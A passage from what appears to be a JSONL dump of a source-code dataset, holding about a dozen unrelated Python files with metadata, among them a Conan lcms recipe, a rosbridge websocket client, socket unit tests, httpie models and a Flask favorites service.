regressor.predict(X_test)\ny_pred\n\n\n# In[13]:\n\n\nfor i in dataset.columns:\n sns.boxplot(dataset[i])\n plt.show()\n \n\n\n# In[14]:\n\n\nfrom sklearn.metrics import r2_score, accuracy_score\nr2_score(y_test,y_pred)*100\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"Mulitple_linear_Regression.py","file_name":"Mulitple_linear_Regression.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"338770205","text":"# -*- coding: utf-8-unix -*-\n\nfrom collections import defaultdict\nfrom pprint import pprint\n\nimport redmine_wrapper.lib as lib\nfrom redmine_wrapper.node import RedmineWrapperProjectNode\nfrom redmine_wrapper.node import RedmineWrapperIssueNode\n\n\nclass RedmineWrapperContainer(object):\n def __init__(self, Node, url, rs):\n self.each_result = []\n self.url = url\n\n self.node = dict([(r['id'], Node(r)) for r in rs])\n self.version = dict([n.version() for n in self.node.values()])\n\n node_v = dict()\n for v in self.version:\n node_v[v] = [id for id in self.node if self.node[id].version_id() == v]\n\n self.tree = {}\n for v in self.version:\n self.tree[v] = defaultdict(list)\n for pid in set([self.node[id].parent_id() for id in node_v[v]]):\n self.tree[v][pid] = [id for id in node_v[v]\n if self.node[id].parent_id() is pid]\n\n self.sort()\n\n\n def sort(self):\n for v in self.tree:\n for id in self.tree[v]:\n self.tree[v][id].sort(\n key=lambda x:(self.node[x].start(), self.node[x].id())\n )\n\n\n def each(self, vfunc, func, gen = 0, id = None):\n self.each_result = []\n for v in self.version:\n flag, g, result = vfunc(v, self.version[v])\n if flag == True:\n self.each_result.append(result)\n gen += g\n self._each(func, v, gen, id)\n return self.each_result\n\n\n def _each(self, func, ver, gen, id):\n flag = True\n next_gen = gen\n if id is not None:\n flag, result = func(self.node[id], gen)\n self.each_result.append(result)\n next_gen += 1\n if flag == True:\n for next_id in self.tree[ver][id]:\n self._each(func, ver, next_gen, next_id)\n\n\nclass RedmineWrapperProjectContainer(RedmineWrapperContainer):\n def __init__(self, url, rs, **kwargs):\n super().__init__(RedmineWrapperProjectNode, url, rs)\n self.filter(**kwargs)\n\n\n def filter(self, **kwargs):\n if 'project_id' in kwargs:\n value = int(kwargs['project_id'])\n for v in self.version:\n for id in list(self.tree[v].keys()):\n if id != value:\n del self.tree[v][id]\n self.tree[v][None] = [value]\n\n if 'subproject_id' in kwargs:\n value = kwargs['subproject_id']\n if value == '!*':\n for v in self.version:\n for id in self.tree[v][None]:\n if id in self.tree[v]:\n del self.tree[v][id]\n else:\n value = int(value)\n for v in self.version:\n for id in self.tree[v][None]:\n self.tree[v][id] = [value] if value in self.tree[v][id] else []\n\n\n def text(self):\n def vfunc(id, name):\n return (False, None, None)\n\n def func(node, gen):\n return (True, node.text(gen))\n\n result = self.each(vfunc, func)\n return '\\n'.join(result).format(__url__=self.url)\n\n\n def markdown(self):\n pass\n\n\n def html(self):\n pass\n\n\nclass RedmineWrapperIssueContainer(RedmineWrapperContainer):\n def __init__(self, url, rs, **kwargs):\n super().__init__(RedmineWrapperIssueNode, url, rs)\n self.filter(**kwargs)\n\n\n def filter(self, **kwargs):\n for key, value in kwargs.items():\n if key == 'period':\n s = lib.str2date(value[0])\n e = lib.str2date(value[1])\n for v in self.version:\n for pid in self.tree[v]:\n self.tree[v][pid] = [id for id in self.tree[v][pid]\n if self.node[id].within(s, e)]\n if key == 'start':\n s = lib.str2date(value)\n for v in self.version:\n for pid in self.tree[v]:\n self.tree[v][pid] = [id for id in self.tree[v][pid]\n if s <= self.node[id].start()]\n if key == 'end':\n e = lib.str2date(value)\n for v in self.version:\n for pid in self.tree[v]:\n self.tree[v][pid] = [id for id in self.tree[v][pid]\n if self.node[id].end() < e]\n\n\n def text(self):\n def vfunc(id, name):\n return (True, 0, '(({}))'.format(name))\n\n def func(node, gen):\n return (True, node.text(gen))\n\n result = self.each(vfunc, func)\n return '\\n'.join(result).format(__url__=self.url)\n\n\n def markdown(self):\n pass\n\n\n def html(self):\n pass\n\n","sub_path":"redmine_wrapper/container.py","file_name":"container.py","file_ext":"py","file_size_in_byte":4232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"509994639","text":"import os\n\nfrom conans import ConanFile, tools, AutoToolsBuildEnvironment, MSBuild\nfrom conans.tools import Version\n\n\nclass LcmsConan(ConanFile):\n name = \"lcms\"\n url = \"https://github.com/conan-io/conan-center-index\"\n description = \"A free, open source, CMM engine.\"\n license = \"MIT\"\n homepage = \"https://github.com/mm2/Little-CMS\"\n topics = (\"conan\", \"lcms\", \"cmm\", \"icc\", \"cmm-engine\")\n settings = \"os\", \"arch\", \"compiler\", \"build_type\"\n options = {\"shared\": [True, False], \"fPIC\": [True, False]}\n default_options = {\"shared\": False, \"fPIC\": True}\n generators = \"cmake\"\n _source_subfolder = \"source_subfolder\"\n\n def build_requirements(self):\n if tools.os_info.is_windows and \"CONAN_BASH_PATH\" not in os.environ and \\\n tools.os_info.detect_windows_subsystem() != \"msys2\":\n self.build_requires(\"msys2/20190524\")\n\n def config_options(self):\n if self.settings.os == \"Windows\":\n del self.options.fPIC\n\n def configure(self):\n del self.settings.compiler.libcxx\n del self.settings.compiler.cppstd\n\n def source(self):\n tools.get(**self.conan_data[\"sources\"][self.version])\n os.rename(\"Little-CMS-lcms%s\" % self.version, self._source_subfolder)\n\n def _build_visual_studio(self):\n # since VS2015 vsnprintf is built-in\n if Version(self.settings.compiler.version) >= \"14\":\n path = os.path.join(self._source_subfolder, \"src\", \"lcms2_internal.h\")\n tools.replace_in_file(path, \"# define vsnprintf _vsnprintf\", \"\")\n\n with tools.chdir(os.path.join(self._source_subfolder, \"Projects\", \"VC2013\")):\n target = \"lcms2_DLL\" if self.options.shared else \"lcms2_static\"\n upgrade_project = Version(self.settings.compiler.version) > \"12\"\n # run build\n msbuild = MSBuild(self)\n msbuild.build(\"lcms2.sln\", targets=[target], platforms={\"x86\": \"Win32\"}, upgrade_project=upgrade_project)\n\n def _build_configure(self):\n if self.settings.os == \"Android\" and tools.os_info.is_windows:\n # remove escape for quotation marks, to make ndk on windows happy\n tools.replace_in_file(os.path.join(self._source_subfolder, \"configure\"),\n \"s/[\t `~#$^&*(){}\\\\\\\\|;'\\\\\\''\\\"<>?]/\\\\\\\\&/g\", \"s/[\t `~#$^&*(){}\\\\\\\\|;<>?]/\\\\\\\\&/g\")\n env_build = AutoToolsBuildEnvironment(self, win_bash=tools.os_info.is_windows)\n with tools.chdir(self._source_subfolder):\n args = [\"prefix=%s\" % self.package_folder]\n if self.options.shared:\n args.extend([\"--disable-static\", \"--enable-shared\"])\n else:\n args.extend([\"--disable-shared\", \"--enable-static\"])\n args.append(\"--without-tiff\")\n args.append(\"--without-jpeg\")\n env_build.configure(args=args)\n env_build.make()\n env_build.make(args=[\"install\"])\n\n def build(self):\n if self.settings.compiler == \"Visual Studio\":\n self._build_visual_studio()\n else:\n self._build_configure()\n\n def package(self):\n self.copy(pattern=\"COPYING\", dst=\"licenses\", src=self._source_subfolder)\n if self.settings.compiler == \"Visual Studio\":\n self.copy(pattern=\"*.h\", src=os.path.join(self._source_subfolder, \"include\"), dst=\"include\", keep_path=True)\n if self.options.shared:\n self.copy(pattern=\"*.lib\", src=os.path.join(self._source_subfolder, \"bin\"), dst=\"lib\", keep_path=False)\n self.copy(pattern=\"*.dll\", src=os.path.join(self._source_subfolder, \"bin\"), dst=\"bin\", keep_path=False)\n else:\n self.copy(pattern=\"*.lib\", src=os.path.join(self._source_subfolder, \"Lib\", \"MS\"), dst=\"lib\",\n keep_path=False)\n # remove entire share directory\n tools.rmdir(os.path.join(self.package_folder, \"share\"))\n # remove pkgconfig\n tools.rmdir(os.path.join(self.package_folder, \"lib\", \"pkgconfig\"))\n # remove la files\n la = os.path.join(self.package_folder, \"lib\", \"liblcms2.la\")\n if os.path.isfile(la):\n os.unlink(la)\n # remove binaries\n for bin_program in [\"tificc\", \"linkicc\", \"transicc\", \"psicc\", \"jpgicc\"]:\n for ext in [\"\", \".exe\"]:\n try:\n os.remove(os.path.join(self.package_folder, \"bin\", bin_program + ext))\n except:\n pass\n\n def package_info(self):\n if self.settings.compiler == \"Visual Studio\":\n self.cpp_info.libs = [\"lcms2\" if self.options.shared else \"lcms2_static\"]\n if self.options.shared:\n self.cpp_info.defines.append(\"CMS_DLL\")\n else:\n self.cpp_info.libs = [\"lcms2\"]\n","sub_path":"recipes/lcms/all/conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":4813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"441914259","text":"#!/usr/bin/env python\n# Note that this needs:\n# sudo pip install websocket-client\n# not the library called 'websocket'\n\nimport json\nfrom uuid import uuid4\nimport websocket\nimport yaml\nfrom geometry_msgs.msg import PoseStamped\nimport rospy\nfrom std_msgs.msg import Header,String,Float32,Int8\nfrom sensor_msgs.msg import CompressedImage,Image\nfrom rospy_message_converter import message_converter\nimport cv2\nimport numpy as np\n\nclass WebsocketROSClient(object):\n def __init__(self, websocket_ip, port=9090):\n \"\"\"\n Class to manage publishing to ROS thru a rosbridge websocket.\n :param str websocket_ip: IP of the machine with the rosbridge server.\n :param int port: Port of the websocket server, defaults to 9090.\n \"\"\"\n #print(\"Connecting to websocket: {}:{}\".format(websocket_ip, port))\n \n self.ws = websocket.create_connection(\n 'ws://' + websocket_ip + ':' + str(port))\n self._advertise_dict = {}\n\n def _advertise(self, topic_name, topic_type):\n \"\"\"\n Advertise a topic with it's type in 'package/Message' format.\n :param str topic_name: ROS topic name.\n :param str topic_type: ROS topic type, e.g. std_msgs/String.\n :returns str: ID to de-advertise later on.\n \"\"\"\n new_uuid = str(uuid4())\n self._advertise_dict[new_uuid] = {'topic_name': topic_name,\n 'topic_type': topic_type}\n advertise_msg = {\"op\": \"advertise\",\n \"id\": new_uuid,\n \"topic\": topic_name,\n \"type\": topic_type\n }\n self.ws.send(json.dumps(advertise_msg))\n return new_uuid\n\n def _unadvertise(self, uuid):\n unad_msg = {\"op\": \"unadvertise\",\n \"id\": uuid,\n # \"topic\": topic_name\n }\n self.ws.send(json.dumps(unad_msg))\n \n def __del__(self):\n \"\"\"Cleanup all advertisings\"\"\"\n d = self._advertise_dict\n for k in d:\n self._unadvertise(k)\n\n def _publish(self, topic_name, message):\n \"\"\"\n Publish onto the already advertised topic the msg in the shape of\n a Python dict.\n :param str topic_name: ROS topic name.\n :param dict msg: Dictionary containing the definition of the message.\n \"\"\"\n msg = {\n 'op': 'publish',\n 'topic': topic_name,\n 'msg': message\n }\n json_msg = json.dumps(msg)\n self.ws.send(json_msg)\n\n def publish(self, topic_name, ros_message):\n \"\"\"\n Publish on a topic given ROS message thru rosbridge.\n :param str topic_name: ROS topic name.\n :param * ros_message: Any ROS message instance, e.g. LaserScan()\n from sensor_msgs/LaserScan.\n \"\"\"\n # First check if we already advertised the topic\n d = self._advertise_dict\n for k in d:\n if d[k]['topic_name'] == topic_name:\n # Already advertised, do nothing\n break\n else:\n # Not advertised, so we advertise\n topic_type = ros_message._type\n self._advertise(topic_name, topic_type)\n # Converting ROS message to a dictionary thru YAML\n ros_message_as_dict = yaml.load(ros_message.__str__(), Loader=yaml.FullLoader)\n # Publishing\n self._publish(topic_name, ros_message_as_dict)\n\n def subscribe(self,topic_name, ros_message):\n # First check if we already advertised the topic\n d = self._advertise_dict\n for k in d:\n if d[k]['topic_name'] == topic_name:\n # Already advertised, do nothing\n break\n else:\n # Not advertised, so we advertise\n topic_type = ros_message._type\n self._advertise(topic_name, topic_type)\n # Converting ROS message to a dictionary thru YAML\n ros_message_as_dict = yaml.load(ros_message.__str__(), Loader=yaml.FullLoader)\n # Publishing\n return self._subscribe(topic_name, ros_message_as_dict, ros_message._type)\n\n def _subscribe(self, topic_name, message, type):\n \"\"\"\n Publish onto the already advertised topic the msg in the shape of\n a Python dict.\n :param str topic_name: ROS topic name.\n :param dict msg: Dictionary containing the definition of the message.\n \"\"\"\n msg = {\n 'op': 'subscribe',\n 'topic': topic_name,\n 'type' : type\n }\n json_msg = json.dumps(msg)\n self.ws.send(json_msg)\n json_message = self.ws.recv()\n\n dictionary = json.loads(json_message)['msg']\n result = message_converter.convert_dictionary_to_ros_message(type, dictionary)\n #print(\"Type: '%s' \\n Received: '%s'\" % (type, result))\n return result\n\n#if __name__ == '__main__':\n# connect = WebsocketROSClient('127.0.0.1')\n \n","sub_path":"goodgame_fptu_dl/scripts/extensions/rosws.py","file_name":"rosws.py","file_ext":"py","file_size_in_byte":4989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"143825915","text":"#\n# @section License\n#\n# The MIT License (MIT)\n# \n# Copyright (c) 2016, Erik Moqvist\n# \n# Permission is hereby granted, free of charge, to any person\n# obtaining a copy of this software and associated documentation\n# files (the \"Software\"), to deal in the Software without\n# restriction, including without limitation the rights to use, copy,\n# modify, merge, publish, distribute, sublicense, and/or sell copies\n# of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be\n# included in all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND,\n# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF\n# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND\n# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS\n# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN\n# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN\n# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n#\n# This file is part of the Pumbaa project.\n#\n\n\nimport select\nimport socket\nimport harness\nfrom harness import assert_raises\n\n\ndef test_print():\n print(socket)\n\n\ndef test_tcp_client():\n client = socket.socket()\n client.connect((\"192.168.1.101\", 80))\n assert client.send(b'foo') == 3\n assert client.recv(3) == b'bar'\n client.close()\n\n\ndef test_tcp_server():\n listener = socket.socket()\n listener.bind((\"192.168.1.102\", 8080))\n listener.listen(5)\n listener.accept()\n listener.close()\n\n\ndef test_udp():\n socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\n\ndef test_select():\n poll = select.poll()\n tcp = socket.socket()\n\n # Register both event channels.\n poll.register(tcp)\n\n # Timeout waiting for data on the socket.\n assert poll.poll(0.01) == []\n\n tcp.close()\n\n\ndef test_bad_arguments():\n # Bad socket family.\n with assert_raises(OSError):\n socket.socket(-1)\n\n # Bad socket type.\n with assert_raises(OSError):\n socket.socket(socket.AF_INET, -1)\n\n\ndef main():\n testcases = [\n (test_print, \"test_print\"),\n (test_tcp_client, \"test_tcp_client\"),\n (test_tcp_server, \"test_tcp_server\"),\n (test_udp, \"test_udp\"),\n (test_select, \"test_select\"),\n (test_bad_arguments, \"test_bad_arguments\")\n ]\n harness.run(testcases)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"tst/socket/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"273136726","text":"import abc\nimport enum\n\nfrom . import t_tkinter\nfrom misc import Path\nfrom misc.Windows import w as Windows\n\n@enum.unique\nclass ColorSchemeEnum(enum.Enum):\n background = 'gray10'\n transparent = 'white'\n p1_text = '#93A1A1'\n p2_text = '#586E75'\n system_text = 'lawn green'\n advantage_plus = 'DodgerBlue2'\n advantage_slight_minus = 'ivory2'\n advantage_safe_minus = 'ivory3'\n advantage_punishible = 'orchid2'\n advantage_very_punishible = 'deep pink'\n advantage_text = 'black'\n\nclass Overlay:\n padding = 15\n\n @abc.abstractmethod\n def update_state(self):\n pass\n\n @abc.abstractmethod\n def get_geometry(self):\n pass\n\n def __init__(self):\n self.visible = False\n\n window_name = self.get_name()\n print(\"Launching {}\".format(window_name))\n\n self.toplevel = t_tkinter.Toplevel()\n\n self.toplevel.wm_title(window_name)\n self.toplevel.iconbitmap(Path.path('./img/tekken_bot_close.ico'))\n self.toplevel.overrideredirect(True)\n\n self.background_color = ColorSchemeEnum.background.value\n self.tranparency_color = self.background_color\n self.toplevel.configure(background=self.tranparency_color)\n\n self.toplevel.attributes(\"-topmost\", True)\n\n def get_name(self):\n return self.__class__.__name__\n\n def update_location(self, game_reader):\n if Windows.valid:\n tekken_rect = game_reader.get_window_rect()\n else:\n tekken_rect = FullscreenTekkenRect(self.toplevel)\n if tekken_rect is not None:\n x, y = self.get_geometry(tekken_rect)\n geometry = '+%d+%d' % (x, y)\n self.toplevel.geometry(geometry)\n if not self.visible:\n self.show()\n else:\n self.hide()\n\n def show(self):\n self.toplevel.deiconify()\n self.visible = True\n\n def hide(self):\n self.toplevel.withdraw()\n self.visible = False\n\nclass FullscreenTekkenRect:\n def __init__(self, toplevel):\n self.left = 0\n self.right = toplevel.winfo_screenwidth()\n self.top = 0\n self.bottom = toplevel.winfo_screenheight()\n","sub_path":"src/gui/Overlay.py","file_name":"Overlay.py","file_ext":"py","file_size_in_byte":2176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"186047610","text":"import uuid\n\nfrom app.main import db\nfrom app.main.model.favorites import Favorites\nfrom app.main.model.application import Application\n\ndef favorites_list(user_email):\n return Favorites.query.filter_by(user_email=user_email).all()\n\ndef favorites_save(data):\n application = Application.query.filter_by(public_id=data['application_public_id']).first()\n favorites = Favorites.query.filter_by(user_email=data['user_email']).filter_by(application_public_id=data['application_public_id']).first()\n if not favorites:\n new_favorites = Favorites(\n public_id=str(uuid.uuid4()),\n user_email=data['user_email'],\n application_public_id=data['application_public_id'],\n application_name=application.name,\n application_category=application.category,\n application_rating_average=application.rating_average,\n application_image_logo=application.image_logo,\n application_price=application.price\n )\n save_changes(new_favorites)\n response_object = {\n 'status': 'success',\n 'message': 'Successfully saved.',\n }\n return response_object, 201\n else:\n response_object = {\n 'status': 'fail',\n 'message': 'favorites already exists.',\n }\n return response_object, 409\n\ndef favorites_remove(public_id):\n favorites = Favorites.query.filter_by(public_id=public_id).first()\n remove_changes(favorites)\n response_object = {\n 'status': 'success',\n 'message': 'Successfully removed.',\n }\n return response_object, 200\n\ndef save_changes(data):\n db.session.add(data)\n db.session.commit()\n\ndef remove_changes(data):\n db.session.delete(data)\n db.session.commit()","sub_path":"apppedia/app/main/service/favorites_service.py","file_name":"favorites_service.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"400429064","text":"from project import db\nfrom project.api.models import List, Item\n\n\ndef add_list(title):\n new_list = List(title=title)\n db.session.add(new_list)\n db.session.commit()\n return new_list\n\n\ndef add_item(item, list_id):\n new_item = Item(item=item, list_id=list_id)\n db.session.add(new_item)\n db.session.commit()\n return new_item\n","sub_path":"services/todolist/project/tests/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"368482892","text":"test_dict = {'gfg' : [5, 6, 7, 8],\n 'is' : [10, 11, 7, 5],\n 'best' : [6, 12, 10, 8],\n 'for' : [1, 2, 5]}\n#count=1\nk=[]\ns=[]\nfor i in test_dict.values():\n print(i)\n s.extend(i)\nprint(s)\nfor m in s:\n if m not in k:\n k.append(m)\n #count+=1\n\nprint(k)\nk.sort()\nprint(k)\nprint(max(k))\nprint(min(k))\n","sub_path":"Programs/Dictionary/Extract Unique values dictionary values.py","file_name":"Extract Unique values dictionary values.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"521443441","text":"from __future__ import unicode_literals\n\nfrom pygments.token import Token\nfrom ..enums import IncrementalSearchDirection\nfrom .utils import token_list_len\nfrom .processors import Processor\n\n__all__ = (\n 'DefaultPrompt',\n)\n\n\nclass DefaultPrompt(Processor):\n \"\"\"\n Default prompt. This one shows the 'arg' and reverse search like\n Bash/readline normally do.\n \"\"\"\n def __init__(self, prompt='> '):\n self.prompt = prompt\n\n def run(self, cli, buffer, tokens):\n # Get text before cursor.\n if buffer.isearch_state:\n before = _get_isearch_tokens(buffer.isearch_state)\n\n elif cli.input_processor.arg is not None:\n before = _get_arg_tokens(cli)\n\n else:\n before = [(Token.Prompt, self.prompt)]\n\n # Insert before buffer text.\n shift_position = token_list_len(before)\n\n return before + tokens, lambda i: i + shift_position\n\n def invalidation_hash(self, cli, buffer):\n return (\n cli.input_processor.arg,\n buffer.isearch_state,\n buffer.isearch_state and buffer.isearch_state.isearch_text,\n )\n\n\ndef _get_isearch_tokens(isearch_state):\n def before():\n if isearch_state.isearch_direction == IncrementalSearchDirection.BACKWARD:\n text = 'reverse-i-search'\n else:\n text = 'i-search'\n\n return [(Token.Prompt.Search, '(%s)`' % text)]\n\n def text():\n index = isearch_state.no_match_from_index\n text = isearch_state.isearch_text\n\n if index is None:\n return [(Token.Prompt.Search.Text, text)]\n else:\n return [\n (Token.Prompt.Search.Text, text[:index]),\n (Token.Prompt.Search.Text.NoMatch, text[index:])\n ]\n\n def after():\n return [(Token.Prompt.Search, '`: ')]\n\n return before() + text() + after()\n\n\ndef _get_arg_tokens(cli):\n \"\"\"\n Tokens for the arg-prompt.\n \"\"\"\n arg = cli.input_processor.arg\n\n return [\n (Token.Prompt.Arg, '(arg: '),\n (Token.Prompt.Arg.Text, str(arg)),\n (Token.Prompt.Arg, ') '),\n ]\n","sub_path":"prompt_toolkit/layout/prompt.py","file_name":"prompt.py","file_ext":"py","file_size_in_byte":2127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"327139168","text":"#!/usr/bin/env python\n#-*- encoding:utf8 -*-\n# File Name:t.py\n# Author:ul1n(linlin152@foxmail.com)\n# Time:2018年10月31日 星期三 15时06分25秒\n\nimport asyncio\nimport os\nimport sys\n\nfrom mworker.manager import WorkerManager, WorkerType\nfrom mworker.utils import get_logger\n\n\ndev = True\n\nlog = get_logger('examples.mymanager.MyManager')\n\ncwd = os.getcwd()\n\nclass MyManager(WorkerManager):\n\n def __init__(self):\n self._check_timeout = 10\n if not dev:\n config = dict(\n tag='myworker',\n rds_config={\n 'host':'r3d1s',\n 'db': 7,\n 'port':6379,\n },\n image='myworker',\n command='python3 -m examples.myworker',\n network='redis_default',\n hostwd=cwd\n )\n super(MyManager, self).__init__(WorkerType.CONTAINER, **config)\n else:\n config = dict(\n tag='myworker',\n rds_config={\n 'host': 'r3d1s',\n 'db': 7,\n 'port': 6379,\n },\n command='gnome-terminal -- python3 -m examples.myworker',\n hostwd=cwd\n )\n super(MyManager, self).__init__(WorkerType.PROCESS, **config)\n self._count = 0\n\n async def _setup(self):\n await super(MyManager, self)._setup()\n self.set_setup_done()\n\n def gen_worker_id(self):\n self._count += 1\n return 'zone'+ str(self._count)\n\n async def check(self):\n wcount = await self.cache.get_all_worker_id()\n log.info(wcount)\n self._count = len(wcount)\n if self._count == 0:\n wid = self._gen_worker_id()\n args = dict(name='worker1', count=3)\n await self.cache.set_worker_args(wid, args, jsn=True)\n self.start_worker(wid)\n wid = self._gen_worker_id()\n args = dict(name='worker2', count=3)\n await self.cache.set_worker_args(wid, args, jsn=True)\n self.start_worker(wid)\n\n await asyncio.sleep(0.01)\n if self.should_log():\n log.info('checking')\n\n\ndef main():\n m = MyManager()\n try:\n m.start()\n except KeyboardInterrupt as e:\n log.info('exit by user')\n asyncio.ensure_future(m.stop())\n log.info('exited')\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"examples/mymanager.py","file_name":"mymanager.py","file_ext":"py","file_size_in_byte":2481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"598101500","text":"import os\nimport sys\nfrom requests.compat import urlparse, is_windows, bytes, str\n\n\nclass Environment(object):\n \"\"\"Holds information about the execution context.\n\n Groups various aspects of the environment in a changeable object\n and allows for mocking.\n\n \"\"\"\n\n #noinspection PyUnresolvedReferences\n is_windows = is_windows\n\n progname = os.path.basename(sys.argv[0])\n if progname not in ['http', 'https']:\n progname = 'http'\n\n stdin_isatty = sys.stdin.isatty()\n stdin = sys.stdin\n stdout_isatty = sys.stdout.isatty()\n stdout = sys.stdout\n stderr = sys.stderr\n\n # Can be set to 0 to disable colors completely.\n colors = 256 if '256color' in os.environ.get('TERM', '') else 88\n\n def __init__(self, **kwargs):\n self.__dict__.update(**kwargs)\n\n def init_colors(self):\n # We check for real Window here, not self.is_windows as\n # it could be mocked.\n if (is_windows and not self.__colors_initialized\n and self.stdout == sys.stdout):\n import colorama.initialise\n self.stdout = colorama.initialise.wrap_stream(\n self.stdout, autoreset=False,\n convert=None, strip=None, wrap=True)\n self.__colors_initialized = True\n __colors_initialized = False\n\n\nclass HTTPMessage(object):\n \"\"\"Model representing an HTTP message.\"\"\"\n\n def __init__(self, orig):\n self._orig = orig\n\n @property\n def content_type(self):\n return str(self._orig.headers.get('Content-Type', ''))\n\n\nclass HTTPResponse(HTTPMessage):\n \"\"\"A `requests.models.Response` wrapper.\"\"\"\n\n def __iter__(self):\n mb = 1024 * 1024\n return self._orig.iter_content(chunk_size=2 * mb)\n\n @property\n def line(self):\n \"\"\"Return Status-Line\"\"\"\n original = self._orig.raw._original_response\n return str('HTTP/{version} {status} {reason}'.format(\n version='.'.join(str(original.version)),\n status=original.status,\n reason=original.reason\n ))\n\n @property\n def headers(self):\n return str(self._orig.raw._original_response.msg)\n\n @property\n def encoding(self):\n return self._orig.encoding or 'utf8'\n\n @property\n def body(self):\n # Only now the response body is fetched.\n # Shouldn't be touched unless the body is actually needed.\n return self._orig.content\n\n\nclass HTTPRequest(HTTPMessage):\n \"\"\"A `requests.models.Request` wrapper.\"\"\"\n\n def __iter__(self):\n yield self.body\n\n @property\n def line(self):\n \"\"\"Return Request-Line\"\"\"\n url = urlparse(self._orig.url)\n\n # Querystring\n qs = ''\n if url.query or self._orig.params:\n qs = '?'\n if url.query:\n qs += url.query\n # Requests doesn't make params part of ``request.url``.\n if self._orig.params:\n if url.query:\n qs += '&'\n #noinspection PyUnresolvedReferences\n qs += type(self._orig)._encode_params(self._orig.params)\n\n # Request-Line\n return str('{method} {path}{query} HTTP/1.1'.format(\n method=self._orig.method,\n path=url.path or '/',\n query=qs\n ))\n\n @property\n def headers(self):\n headers = dict(self._orig.headers)\n content_type = headers.get('Content-Type')\n\n if isinstance(content_type, bytes):\n # Happens when uploading files.\n # TODO: submit a bug report for Requests\n headers['Content-Type'] = str(content_type)\n\n if 'Host' not in headers:\n headers['Host'] = urlparse(self._orig.url).netloc\n\n return '\\n'.join('%s: %s' % (name, value)\n for name, value in headers.items())\n\n @property\n def encoding(self):\n return 'utf8'\n\n @property\n def body(self):\n \"\"\"Reconstruct and return the original request body bytes.\"\"\"\n if self._orig.files:\n # TODO: would be nice if we didn't need to encode the files again\n # FIXME: Also the boundary header doesn't match the one used.\n for fn, fd in self._orig.files.values():\n # Rewind the files as they have already been read before.\n fd.seek(0)\n body, _ = self._orig._encode_files(self._orig.files)\n else:\n try:\n body = self._orig.data\n except AttributeError:\n # requests < 0.12.1\n body = self._orig._enc_data\n\n if isinstance(body, dict):\n #noinspection PyUnresolvedReferences\n body = type(self._orig)._encode_params(body)\n\n if isinstance(body, str):\n body = body.encode('utf8')\n\n return body\n","sub_path":"httpie/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"575686879","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /usr/local/lib/python2.7/dist-packages/rimuapi.py\n# Compiled at: 2015-03-24 11:50:03\nimport urllib, os\nfrom requests import Request, Session\ntry:\n import json\nexcept:\n import simplejson as json\n\ndef sort_uniq(sequence):\n import itertools, operator\n return itertools.imap(operator.itemgetter(0), itertools.groupby(sorted(sequence)))\n\n\ndef valid_domain_name(domain_name):\n import re\n if len(domain_name) > 255:\n return False\n domain_name.rstrip('.')\n allowed = re.compile('(?!-)[A-Z\\\\d-]{1,63}(? 0]) / X[X > 0]).tolist())\n\n\t\tX = numpy.reshape(X, (-1, 1))\n\t\tY = numpy.reshape(Y, (-1, 1))\n\n\t\tself.train_x = X\n\t\tself.train_y = Y\n\n\t\tX = numpy.array(numpy.arange(-30, 0, 0.01).tolist() + [0.0] + numpy.arange(0.01, 30.01, 0.01).tolist())\n\t\tY = numpy.array((numpy.sin(X[X < 0]) / X[X < 0]).tolist() + [1.0] + (numpy.sin(X[X > 0]) / X[X > 0]).tolist())\n\n\t\tX = numpy.reshape(X, (-1, 1))\n\t\tY = numpy.reshape(Y, (-1, 1))\n\t\t\n\t\tself.test_x = X\n\t\tself.test_y = Y","sub_path":"Experiments/FFNN/MLELM/Datasets/Sinc.py","file_name":"Sinc.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"187268714","text":"from django.conf.urls import url\nfrom rest_framework.urlpatterns import format_suffix_patterns\nfrom . import views\n\nouter_list = views.OuterViewSet.as_view({\n 'get': 'list',\n 'post': 'create'\n})\n\nouter_detail = 